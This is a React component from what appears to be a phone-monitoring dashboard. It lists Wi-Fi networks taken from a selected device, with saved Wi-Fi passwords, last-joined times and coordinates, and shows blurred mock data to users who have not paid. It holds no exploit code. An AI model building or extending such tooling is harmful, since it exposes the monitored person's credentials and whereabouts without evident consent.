import { useState, useEffect, useRef, useCallback } from 'react'
import { useExtremeUpgradeRefresh } from 'src/hooks/useExtremeUpgradeRefresh'
import { useTranslation } from 'src/utils/i18n'
import TextField from '@mui/material/TextField'
import InputAdornment from '@mui/material/InputAdornment'
import dayjs from 'dayjs'

// request
import { getGcloudAll, getLocalAndroidAll, getWifi } from 'src/@api/dashboard'
import Image from 'next/image'
import Head from 'next/head'
import WifiDrawer from 'src/@core/components/wifi-info'
import { useDispatch, useSelector } from 'react-redux'
import { setCurrentTab, changeExtremeService } from 'src/store/apps/Common'
import { styled } from '@mui/material/styles'
import { generateMockData } from 'src/utils'
import ExtremeUpgradeModal from 'src/@core/components/modal/extreme-upgrade'
import { useExtremeFeatureAccessGate } from 'src/hooks/useExtremeFeatureAccessGate'
import { getUserAccountOrder } from 'src/@api/login'

const ScrollDiv = styled('div')({
  '@media (max-width: 600px)': {
    '-msOverflowStyle': 'none',  /* 适用于 IE 和 Edge */
    scrollbarWidth: 'none',  /* 适用于 Firefox */
    '&::-webkit-scrollbar': {
      display: 'none', /* 适用于 WebKit 浏览器（如 Chrome、Safari 和新版 Edge） */
    }
  }
})

const WifiNetworks = ({ type }) => {
  let { data: userData } = JSON.parse(localStorage.getItem('userData'))

  let getDeviceUser =
    JSON.parse(localStorage.getItem('DeviceUser')) != null
      ? JSON.parse(localStorage.getItem('DeviceUser')).username
      : ''

  const { t, locale } = useTranslation('common')

  let Advanced = window.localStorage.getItem('Advanced')
  Advanced = Advanced == null || Advanced == 0 ? true : false

  const [initWifiNetwork, setInitWifiNetwork] = useState([])

  const [wifiNetwork, setWifiNetwork] = useState([])

  const [wifiInfo, setWifiInfo] = useState({})
  const childRef = useRef()
  const [isLoading, setIsLoading] = useState(true) //正在加载获取数据

  // 分页参数
  const [pagination, setPagination] = useState({
    reqNum: 50, // 单次查询数量
    nowOffset: 0, // 偏移量
    maxNum: false // 全部数据查询完毕
  })

  const [advanced, setAdvanced] = useState(true) // 是否购买高级服务
  const store = useSelector(state => state.Common)
  const [fetchLoading, setFetchLoading] = useState(true) // 数据获取中
  const basicNotOver = [null, ''].includes(store.resetTime.basicUpdateDownloadTime) // 是否未完成一步验证
  const advancedNotOver = [null, ''].includes(store.resetTime.advancedUpdateDownloadTime) // 高级数据未下载完成（空 = 未完成）
  // 高级功能门控（对齐 SpyX）：未绑高级 → 跳 /ios/extreme-verification；数据未就绪 → 暂停渲染
  const { gatePending, showUpgradeModal } = useExtremeFeatureAccessGate(advanced)
  const [justVerified, setJustVerified] = useState(false) // 是否为刚完成验证

  const getWifiData = async nowOffset => {

    let result = []

    if (type === 'android-local') {
      let response = await getLocalAndroidAll({
        username: userData.email,
        params: {
          category: 'WIFI',
          deviceUdid: getDeviceUser,
          offset: nowOffset,
          limit: pagination.reqNum
        }
      })
      setIsLoading(false)
      if (!response.data.contents) return

      result = response.data.contents

    } else if (type === 'google-cloud') {
      let response = await getGcloudAll({
        username: getDeviceUser,
        params: {
          category: 'WIFI'
        }
      })
      setIsLoading(false)
      if (!response.data.contents) return

      result = response.data.contents

    } else {
      const username = JSON.parse(localStorage.getItem('DeviceUser')) != null
        ? JSON.parse(localStorage.getItem('DeviceUser')).username
        : ''

      // 获取最近的10笔订单
      let res = await getUserAccountOrder({ page: 1, pageSize: 10 })

      // 查找有限期最长的订单
      const lastOrder = res.data.sort((a, b) => dayjs(b.expire_time).valueOf() - dayjs(a.expire_time).valueOf())[0]

      // 计算是否为增值服务上线前付费用户

      // 增值服务上线前付费用户状态更新

      let response = await getWifi({
        username,
        params: {
          category: 'WIFI',
          offset: nowOffset,
          limit: pagination.reqNum,
          deviceUdid:
            JSON.parse(localStorage.getItem('currentDevice')) != null
              ? JSON.parse(localStorage.getItem('currentDevice'))['Unique Identifier']
              : ''
        }
      })
      setIsLoading(false)
      const advanced = username == null || !('advanced' in response) || ['true', true].includes(response?.advanced) // 高级服务开通状态
      setAdvanced(advanced)
      dispatch(changeExtremeService(advanced)) // 更新高级服务状态

      if (response.data.contents != null) {
        result = response.data.contents.sort((a, b) => {
          // 如果 a 或 b 的 lastJoined 是空数组，直接返回它们排到后面
          if (a.lastJoined.length === 0) return 1
          if (b.lastJoined.length === 0) return -1

          // 将 lastJoined 数组转换为 Date 对象
          const dateA = new Date(a.lastJoined[0], a.lastJoined[1] - 1, a.lastJoined[2], a.lastJoined[3], a.lastJoined[4], a.lastJoined[5])
          const dateB = new Date(b.lastJoined[0], b.lastJoined[1] - 1, b.lastJoined[2], b.lastJoined[3], b.lastJoined[4], b.lastJoined[5])

          // 返回时间差，进行倒序排序
          return dateB - dateA
        })
      }

      if (!advanced) result = generateMockData(result) // 未升级高级服务时生成虚拟数据
    }

    if (result === null) {
      setPagination(page => ({ ...page, maxNum: true }))
      if (!['android-local', 'google-cloud'].includes(type)) setFetchLoading(false)

      return
    }

    if (initWifiNetwork.length > 0) {
      setWifiNetwork(old => ([...old, ...result]))
      setInitWifiNetwork(old => ([...old, ...result]))
    } else {
      setWifiNetwork(result)
      setInitWifiNetwork(result)
    }

    if (!['android-local', 'google-cloud'].includes(type)) setFetchLoading(false)
  }

  useEffect(() => {
    const nowOffset = 0
    getWifiData(nowOffset)
  }, [getDeviceUser, type, userData.email])

  const dom = useRef(null)

  // 滚动百分比
  const [scroll, setScroll] = useState(0)

  // 升级成功后：预缓冲已在 notify 完成，这里重拉详情读 advanced
  useExtremeUpgradeRefresh(
    useCallback(() => {
      setAdvanced(true)
      setWifiNetwork([])
      setInitWifiNetwork([])
      setPagination({ reqNum: 50, nowOffset: 0, maxNum: false })
      setScroll(0)
      setFetchLoading(true)
      getWifiData(0)
    }, [])
  )

  // 获取滚动百分比
  useEffect(() => {
    const handScroll = () => {
      if (dom.current) {
        const { scrollTop, scrollHeight, clientHeight } = dom.current
        const progress = scrollTop / (scrollHeight - clientHeight) * 100

        setScroll(progress.toFixed(0))
      }
    }

    const currentRef = dom.current
    if (currentRef) {
      currentRef.addEventListener('scroll', handScroll)
    }

    return () => {
      if (currentRef) {
        currentRef.removeEventListener('scroll', handScroll)
      }
    }
  }, [])

  // 监听滚动百分比
  useEffect(() => {
    if (scroll >= 100 && advanced) {
      const nowOffset = pagination.nowOffset + pagination.reqNum
      setPagination(page => ({ ...page, nowOffset }))

      // if (!pagination.maxNum) getWifiData(nowOffset)
    }
  }, [scroll])

  // 处理弹出
  let getWifiInfo = info => {
    if (advanced) {
      setWifiInfo(info)

      childRef.current.toggleDrawerParent('right', true)
    }
  }

  // 处理搜索
  const handleFilter = e => {
    let value = e.target.value
    if (value === '') {
      setWifiNetwork(initWifiNetwork)

      return
    }

    // 搜索过滤
    let filterData = initWifiNetwork.filter(item => {
      if (item.SSID_STR) {
        return item.SSID_STR.toLowerCase().indexOf(value.toLowerCase()) !== -1
      } else if (item.name) {
        return item.name.toLowerCase().indexOf(value.toLowerCase()) !== -1
      }
    })

    setWifiNetwork(filterData)
  }

  const dispatch = useDispatch()

  useEffect(() => {
    const title = t('Wi-Fi network')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, locale])

  return (
    <>
      <Head>
        <meta name="format-detection" content="telephone=no" />
      </Head>
      <div className='bg-[#FFF] [box-shadow:0px_0px_12px_0px_#00000021] rounded-[10px] Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)] pb-[20px] flex flex-col relative'>
        <div className={`w-full px-[15px] pt-[15px] pb-[3px] ${!advanced ? 'blur-[16px] select-none' : ''}`}>
          <TextField
            fullWidth
            className='h-[40px] bg-[rgba(235,235,239,0.92)] rounded-lg !border-0 text-[16px]'
            size='small'
            onInput={e => {
              advanced && handleFilter(e)
            }}
            placeholder={t('Search Wi-Fi')}
            sx={{
              '& .MuiInputBase-root .MuiOutlinedInput-notchedOutline': { border: 0 },
              '& input::placeholder': { fontSize: '16px', color: '#818187', opacity: 100 }
            }}
            InputProps={{
              startAdornment: (
                <InputAdornment position='start'>
                  {/* <Icon icon='mdi:magnify' fontSize='1.25rem' /> */}
                  <Image src='/images/contacts/search.svg' width={18} height={18} alt='search'></Image>
                </InputAdornment>
              )
            }}
          />
        </div>
        {
          !fetchLoading && !gatePending &&
          <>
            {
              (!basicNotOver && !advancedNotOver && !justVerified) ?
                <>
                  {/* 高级服务开通提示 */}
                  {showUpgradeModal && <ExtremeUpgradeModal open />}
                </>
                :
                <>
                  {/* 增值服务 iCloud验证流程 */}
                </>
            }

          </>
        }
        <ScrollDiv ref={dom} className={`w-full h-full relative z-10 ${advanced ? 'overflow-auto' : 'overflow-hidden blur-[16px] select-none'}`}>
          <table className='border-separate border-spacing-x-[15px] border-spacing-y-[10px] w-full smj:hidden'>
            <tr className='sticky top-0 bg-[#FFF]'>
              <th className='pt-[8px] text-start Blds:text-center text-[14px] text-[#000] font-[600] text-nowrap'>
                {t('WIFI NAME')}
              </th>
              <th className='pt-[8px] text-end Blds:text-center text-[14px] text-[#000] font-[600] text-nowrap'>
                {!(type === 'google-cloud') && t('LAST JOINED')}
                {type === 'google-cloud' && t('PASSWORD')}
              </th>
              {type === 'android-local' && (
                <th className='pt-[8px] text-end Blds:text-center text-[14px] text-[#000] font-[600] text-nowrap'>
                  {t('LOCATION')}
                </th>
              )}
            </tr>
            {wifiNetwork.map((row, i) => (
              <tr
                key={i}
                onClick={() => {
                  getWifiInfo(row)
                }}
              >
                <td className='text-[14px] text-[#000] text-nowrap text-start Blds:text-center'>
                  {row.SSID_STR || row.name}
                </td>

                <td className='text-[14px] text-[#000] text-nowrap text-end Blds:text-center'>
                  {!type === 'google-cloud' && row.time}
                  {type === 'google-cloud' && row.password}
                </td>
                {type === 'android-local' && (
                  <td className='text-[14px] text-[#000] text-nowrap text-end Blds:text-center'>
                    {row.lat}
                    {row.lon}
                  </td>
                )}
              </tr>
            ))}
          </table>

          {/* 移动端新ui */}
          <div className='smjs:hidden h-auto'>
            {wifiNetwork.map((row, index) => (
              <div key={index} className={`${!advanced ? 'blur-[16px] select-none' : ''} flex w-full px-[15px]`} onClick={() => { getWifiInfo(row) }}>
                <div className='border-[#e6e6e6] border-b-[0.5px] w-full flex flex-col justify-center py-[12px] font-[Poppins]'>
                  <div className='flex justify-between items-center'>
                    <p className='max-w-[50%] break-all text-[16px] font-[400] leading-[24px]'>{row.SSID_STR || row.name}</p>
                    <p className='text-[14px] font-[400] leading-[21px]'>
                      {!type === 'google-cloud' && row.time ||
                        (row.lastJoined && row.lastJoined.length > 0 && dayjs(`${row.lastJoined[0]}/${row.lastJoined[1]}/${row.lastJoined[2]} ${row.lastJoined[3]}:${row.lastJoined[4]}`).format('YYYY/MM/DD HH:mm'))}
                      {type === 'google-cloud' && row.password}
                    </p>
                  </div>
                </div>
              </div>
            ))}
          </div>
        </ScrollDiv>
        {advanced && initWifiNetwork.length == 0 && !isLoading &&
          <div className='text-center px-2 absolute inset-0 flex justify-center items-center pointer-events-none'>
            {t('It appears theres no data to show here yet')}<br />
            {t('If data exists it may take up to 1 hour to download and appear')}<br />
            {t('We suggest checking back in a little while')}
          </div>}
      </div>
      <WifiDrawer data={wifiInfo} ref={childRef} />
    </>
  )
}

export default WifiNetworks
